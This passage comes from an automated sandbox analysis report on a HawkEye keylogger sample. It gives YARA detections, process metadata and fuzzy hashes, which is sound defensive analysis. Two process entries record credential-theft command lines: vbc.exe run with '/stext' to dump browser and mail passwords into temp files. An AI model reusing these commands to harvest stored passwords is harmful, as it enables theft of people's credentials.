• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

Target ID: 14
Start time: 09:43:59
Start date: 14/02/2022
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000E.00000000.336146363.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: high

Target ID: 15
Start time: 09:44:00
Start date: 14/02/2022
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.337528444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.337820875.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000F.00000000.337259386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: high


Execution Graph

Execution Coverage: 12.2%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 2.5%
Total number of Nodes: 120
Total number of Limit Nodes: 12
(Rendered execution graph not reproduced. API calls referenced by graph nodes: PostMessageW, LoadLibraryExW, GetModuleHandleW, DuplicateHandle, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateActCtxA, VirtualProtect.)

Control-flow Graph
(Rendered graph for the function starting at 17f3031 not reproduced; legend: Executed / Not Executed.)
Strings
Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
• API String ID: 0-2581025826
• Opcode ID: 853775fb73bc08a5f85d27c27940119a844d09408eab5b160acd7216828d8467
• Instruction ID: c7de6f8c468fcd31102db0638d78033de05399c6255f842b3461ca206521585c
• Opcode Fuzzy Hash: 853775fb73bc08a5f85d27c27940119a844d09408eab5b160acd7216828d8467
• Instruction Fuzzy Hash: 93912A74E1520ADFCB08CFA5D8808AEFFB2FF89301B54946AD516AB355D7349A42CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
(Rendered graph for the function starting at 17f3050 not reproduced; legend: Executed / Not Executed.)
Strings
Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
• API String ID: 0-2581025826
• Opcode ID: 9b3a0c8a81b80335c74628321277ce6e78e3521562929f6c61b21ea46e821844
• Instruction ID: 49111ae1fa051fd797a43d02912eed758cb5063b756ad4e7707a902d17a1a6c3
• Opcode Fuzzy Hash: 9b3a0c8a81b80335c74628321277ce6e78e3521562929f6c61b21ea46e821844
• Instruction Fuzzy Hash: 44911874E1520ADFCB08CFA5D9808AEFBB2FF89341F54946AD516AB314D7349A42CF90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
• API String ID: 0-2581025826
• Opcode ID: 56ef0808ed7065ebeff44f1699bb75d79fb13dfe29813fbdc9af85ab2b32d5ff
• Instruction ID: 954a3feb2427d7ed1b13ea7c75c346c0a8eecbb1ecbd15a8192cc4fb0c277c09
• Opcode Fuzzy Hash: 56ef0808ed7065ebeff44f1699bb75d79fb13dfe29813fbdc9af85ab2b32d5ff
• Instruction Fuzzy Hash: 88711974E1420ADFCB44CFA5D8818AEFBB2FF89341B64946AD516A7314D734EA42CF90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
• API String ID: 0-2581025826
• Opcode ID: 24e55b40cc454d5e479f8da9fb625448c00b3833ef98a2084ee41d50d7f91b16
• Instruction ID: b785961d8801b6e78f62aac10622a9fd257c7ebc9cfdf71bb2ced2454ea670e4
• Opcode Fuzzy Hash: 24e55b40cc454d5e479f8da9fb625448c00b3833ef98a2084ee41d50d7f91b16
• Instruction Fuzzy Hash: F0711774E1420ADFCB04CFA5D9818AFFBB2FF89241B64946AD516AB314D734DA42CF90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
• API String ID: 0-2581025826
• Opcode ID: b8f6e164363f8e1bfde3eab506c2e128ece98bf4a42ee6515c3a2edada13bfba
• Instruction ID: 23e4868f2ee1061e9b6ce1ff0171e3fdfc987eb03bfe7281f2e68c8aff0e3474
• Opcode Fuzzy Hash: b8f6e164363f8e1bfde3eab506c2e128ece98bf4a42ee6515c3a2edada13bfba
• Instruction Fuzzy Hash: 19711874E1420ADFCB04CFA5D9818AFFBB2FF89241B64946AD516A7314D734DA42CF90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
• API String ID: 0-2581025826
• Opcode ID: 7d6c74840d4e4752cf9d26c74c6476b2be0452ba1001d0f27e364a3f5e8a8819
• Instruction ID: 90496108a6a18b6ce7f35a762364a16c713450f0f61feee9631b416832becfaf
• Opcode Fuzzy Hash: 7d6c74840d4e4752cf9d26c74c6476b2be0452ba1001d0f27e364a3f5e8a8819
• Instruction Fuzzy Hash: 68712774E1420ADFCB08CFA5D8818AFFBB2FF89201B64946AD516A7314D734DA42CF90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID: q"LD$r#HS$r#HS$r#HS$S?2$S?2$S?2
• API String ID: 0-2581025826
• Opcode ID: 8859e6124cae6821f68e54498482ad3ac81d35d2d2fd929042a89a1bed602934
• Instruction ID: 193f06daf0e1550bdbc1081f204dbda7e61ac6aa42dc3914e029004c8cd30137
• Opcode Fuzzy Hash: 8859e6124cae6821f68e54498482ad3ac81d35d2d2fd929042a89a1bed602934
• Instruction Fuzzy Hash: 28712A74E1420ADFCB44CFA5D8818AEFBB2FF89301B64946AD526A7354D734DA42CF90
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.311047408.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9f10000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: 675f44f985ebd1dfc113d3bb0a9daafc49a0a81b75945d9ac23964cd739a55b4
• Instruction ID: 930378589d1a04ecb014572a414bdd18f6399f14609f1879c20cbd8a42a3f2cd
• Opcode Fuzzy Hash: 675f44f985ebd1dfc113d3bb0a9daafc49a0a81b75945d9ac23964cd739a55b4
• Instruction Fuzzy Hash: DA12BCB5E00218CFDB14CFA9C985AEDBBF2FF88314F248169E919A7245D7349985CF60
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7405eda0d1816198a228891bfe7f8f1b38daff19098634108945ebfce2bd6469
• Instruction ID: 042c607567d85fe11322b251f195177fadf51a2233b4cca2ef08d2b298fc2c1f
• Opcode Fuzzy Hash: 7405eda0d1816198a228891bfe7f8f1b38daff19098634108945ebfce2bd6469
• Instruction Fuzzy Hash: B9C15471E0868A8FDB14CFA9D8406DEFBB2FF99310F18816EE515AB356C770A901CB51
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dd961a9feab354290e5bf2f21486029fb20ee7f4e66e69aa805a2145bbe826bc
                                                                                                                                                    • Instruction ID: af5abec445122af36f2163f202b67de4f5644506eb0c2e994b13d802c98fa814
                                                                                                                                                    • Opcode Fuzzy Hash: dd961a9feab354290e5bf2f21486029fb20ee7f4e66e69aa805a2145bbe826bc
                                                                                                                                                    • Instruction Fuzzy Hash: 9BB11770E15209DFCB08DFA5E94559EFFB2FB89200F20D8A9E506AB358DB349942CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: ae06ba243e128ab784c69654fbd4bcd05388f39af3192a48afdf703b9c76c3c0
                                                                                                                                                    • Instruction ID: 941aa11e005a81c10799c282684cac02448bfb12ac3aa9c6d3b5516f72469050
                                                                                                                                                    • Opcode Fuzzy Hash: ae06ba243e128ab784c69654fbd4bcd05388f39af3192a48afdf703b9c76c3c0
                                                                                                                                                    • Instruction Fuzzy Hash: BC81C174E10219CFDB08CFEAC884A9EFBB2AF88300F14852AD519BB358DB749945CF55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5dd32d72abb7ed5deea099e3b6bfb3c6dd128b333557fa82625df98e03b50083
• Instruction ID: c6e2cf2e7deef84b06f8bfd6c84583872d26d6a1b148d4409500cc3d913ed940
• Opcode Fuzzy Hash: 5dd32d72abb7ed5deea099e3b6bfb3c6dd128b333557fa82625df98e03b50083
• Instruction Fuzzy Hash: 9A615770E1120ADBCB14CFE5C9459AEBBB2FFC9314F10D829E116AB264DB749A01CF60
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1f751925fa89b2ed854a74ddfc36e3101971dab7bdd9504a823bb8a732580a80
• Instruction ID: fd6360f9fd5966e9ae3fe5d212f1c02da7b8f5d4a177daa0504fa8dea1c5690a
• Opcode Fuzzy Hash: 1f751925fa89b2ed854a74ddfc36e3101971dab7bdd9504a823bb8a732580a80
• Instruction Fuzzy Hash: 14614770E1520ADBCB14CFE5C9458AEBBB2FFC9314F10D829E116AB264DB749A01CF60
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 03f05635ad04a1dee50891c973d9702165aff943c7151cf57e816d7141366934
• Instruction ID: 5ac72920b8cc3c5db3239824c2ccec887063730ec8b4a1d560b9f80185c52f1d
• Opcode Fuzzy Hash: 03f05635ad04a1dee50891c973d9702165aff943c7151cf57e816d7141366934
• Instruction Fuzzy Hash: D051F674E0520ACFDB08CFAAC9406AEFBF2EF89300F54D46AD519A7355D7349A418FA4
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e692a10dd6f1be35d2d71dfb21b081d5f3f9f49034def2f8906087186895627
• Instruction ID: 9c3f58960b731c078046967fa301c6c438e72415a1ef8a63c3d1aa51b0fd042e
• Opcode Fuzzy Hash: 4e692a10dd6f1be35d2d71dfb21b081d5f3f9f49034def2f8906087186895627
• Instruction Fuzzy Hash: 4651E474E0520ACFDB08CFAAC9446AEFBF2EF89300F54D46AD519A7354D7349A418FA4
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a15918d5ddc052388730517ea0a245d1762da8f69ff4c22cd177989ddf8f3613
• Instruction ID: f574f160574ad78bde3365efe1a164e1444f7817c716be0a64c02b8d727ab8bf
• Opcode Fuzzy Hash: a15918d5ddc052388730517ea0a245d1762da8f69ff4c22cd177989ddf8f3613
• Instruction Fuzzy Hash: A631F970E046188FEB19CFABDC4079EFBF3AFC9200F18C5AAD508AA255DB7009458F51
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ed7e182d126d799485c07c0417b093984b1d97fa1d57820dd2535fa0c23c44a7
• Instruction ID: 78d99e2e34dc2288a96f14177a5dff6055cb067799796039892de746f0451681
• Opcode Fuzzy Hash: ed7e182d126d799485c07c0417b093984b1d97fa1d57820dd2535fa0c23c44a7
• Instruction Fuzzy Hash: 7121A671E016189BEB58CFABD8406DEFBF7AFC9200F14C5BAD508A6354EB301A558F51
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0d7e42a23c178d176ddb8b76268c135c7030d3a43dc127deafebe94f800bc6fc
• Instruction ID: 62a51669a7db7786c02ec9eaa97b9bb2cbd563a2324657fd99a7513fc659ee4d
• Opcode Fuzzy Hash: 0d7e42a23c178d176ddb8b76268c135c7030d3a43dc127deafebe94f800bc6fc
• Instruction Fuzzy Hash: 8E21F371E006188BDB18CFAADC446DEFBF7AFC8310F18C16AD509A6268DB745A55CF50
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b5581c260e6d50d5da653a06c845dd128d2d369541fe7e8f2262fc393a0efa48
• Instruction ID: 42e5adfa9b8ec3a73a04361c0c17b1039118cfe7dfb475ea88f342b40bf9a9fc
• Opcode Fuzzy Hash: b5581c260e6d50d5da653a06c845dd128d2d369541fe7e8f2262fc393a0efa48
• Instruction Fuzzy Hash: B621F871E006188BEB19CFAADC443DEBBF3AFC9310F18C06AD409AA268DB741955CF51
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

Legend of the rendered graph (colour coding is not recoverable from the extracted text):
• Executed
• Not Executed

Basic blocks recovered from the graph (node: address range, call made in the block, successors):
• 296: 5a4b5db-5a4b659, GetCurrentProcess -> 297, 298
• 298: 5a4b65b-5a4b661 -> 297
• 297: 5a4b662-5a4b696, GetCurrentThread -> 299, 300
• 300: 5a4b698-5a4b69e -> 299
• 299: 5a4b69f-5a4b6d3, GetCurrentProcess -> 302, 303
• 302: 5a4b6d5-5a4b6db -> 303
• 303: 5a4b6dc-5a4b6f7, call 5a4b798 -> 306
• 306: 5a4b6fd-5a4b72c, GetCurrentThreadId -> 307, 308
• 308: 5a4b72e-5a4b734 -> 307
• 307: 5a4b735-5a4b797

Each of the four API calls is followed by a short block (298, 300, 302, 308) that falls through to the next call; the function ends in block 307 after GetCurrentThreadId.

APIs
• GetCurrentProcess.KERNEL32 ref: 05A4B648
• GetCurrentThread.KERNEL32 ref: 05A4B685
• GetCurrentProcess.KERNEL32 ref: 05A4B6C2
• GetCurrentThreadId.KERNEL32 ref: 05A4B71B
Memory Dump Source
• Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 565b93a04c8d9e4798c7f3dac851711dc8083cf77c79a07a0085a67e805fa340
• Instruction ID: 334f229e3a17e4bb4cce5720c70529fb7b06d357594bd41d26b579b1dbb03f59
• Opcode Fuzzy Hash: 565b93a04c8d9e4798c7f3dac851711dc8083cf77c79a07a0085a67e805fa340
• Instruction Fuzzy Hash: 3D5154B49002498FDB10CFA9D989BEEBBF1BF88308F248859E019B7350DB749845CF65
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not available)
APIs
• GetCurrentProcess.KERNEL32 ref: 05A4B648
• GetCurrentThread.KERNEL32 ref: 05A4B685
• GetCurrentProcess.KERNEL32 ref: 05A4B6C2
• GetCurrentThreadId.KERNEL32 ref: 05A4B71B
Memory Dump Source
• Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 2b0beb7dec38bb434eba3ad26ecc518cafaba196628594c7dd92862e9b350eef
• Instruction ID: 908e7d3c8a25cff1f54bffc46987b7c099150f8ef86e561bb440dcbf65b151fb
• Opcode Fuzzy Hash: 2b0beb7dec38bb434eba3ad26ecc518cafaba196628594c7dd92862e9b350eef
• Instruction Fuzzy Hash: B35156B09006498FDB10CFA9D988BDEBBF5FF88308F208859E019A7350DB749844CF65
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not available)
APIs
• GetModuleHandleW.KERNELBASE(?), ref: 05A4941A
Memory Dump Source
• Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: e62d7cec4d8bf600c83d68347ee79b24be9e12cc244f9a2ed498bc58fa21c7ec
• Instruction ID: 9a0629cc8d8900afb24b90864eddde912bfb58e38b1d5f62858e4ed3aa723e66
• Opcode Fuzzy Hash: e62d7cec4d8bf600c83d68347ee79b24be9e12cc244f9a2ed498bc58fa21c7ec
• Instruction Fuzzy Hash: 4F912570A00B058FDB24CFA9D544A9BBBF6FF88204F04892AE45AE7B50D774E855CF91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not available)
APIs
• CreateActCtxA.KERNEL32(?), ref: 05A45199
Memory Dump Source
• Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: c1c23f8c288a9b02e4b7ec2a08e8e7a851b13ccd52095847604955ed776e49a9
• Instruction ID: 9979a058d07a79fd88211569dbf2b7f33a413c99067cea3e09486c6092e9ef15
• Opcode Fuzzy Hash: c1c23f8c288a9b02e4b7ec2a08e8e7a851b13ccd52095847604955ed776e49a9
• Instruction Fuzzy Hash: 0A51E871D0021DCFDB20DFA8C885BCEBBB5BF59304F1084AAD409AB251DB716A89CF51
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not available)
APIs
• CreateActCtxA.KERNEL32(?), ref: 05A45199
Memory Dump Source
• Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: c536fc360d85c734f634637b6958fa05e6e16572a63d617e87c03738b29a91ff
• Instruction ID: 87e45a8873be3c20857980bb30f0f52bc4652bae035958c30fa38774b19d8a80
• Opcode Fuzzy Hash: c536fc360d85c734f634637b6958fa05e6e16572a63d617e87c03738b29a91ff
• Instruction Fuzzy Hash: 9E51D771D0021DCFDB20DFA8C884BDEBBB5BF59304F1084A9D509AB250DB716A89CF91
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not available)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05A4B8DB
Memory Dump Source
• Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 6482d24b1601deb604ea5e856f71420df92302eb8d98509b8e2d013bc2331bd0
• Instruction ID: f3cbb5b2f0a6ba7605a032d4f6f56ec1acb0323d96bf9a33d0ede20cb43f8c63
• Opcode Fuzzy Hash: 6482d24b1601deb604ea5e856f71420df92302eb8d98509b8e2d013bc2331bd0
• Instruction Fuzzy Hash: D34156B9D002589FCF00CFE9D984ADEBBF5BB59310F14942AE818BB210D375A955CF54
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not available)
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05A4B8DB
Memory Dump Source
• Source File: 00000000.00000002.307989570.0000000005A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a40000_tDb0ggawON.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: f27994d10bf185d77eeefae4e3044fb8f61efda2c65f3a2a3ef9f1d3bd0ef7c6
• Instruction ID: 969fee67dcffc3e49a102e89b31bd1b38e284ebcac8a24353fa816317fdb059e
• Opcode Fuzzy Hash: f27994d10bf185d77eeefae4e3044fb8f61efda2c65f3a2a3ef9f1d3bd0ef7c6
• Instruction Fuzzy Hash: 8E4164B9D042599FCF00CFE9D984ADEBBF5BB09310F24942AE818BB210D334A955CF54
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 017F7F77
Memory Dump Source
• Source File: 00000000.00000002.302142797.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_17f0000_tDb0ggawON.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
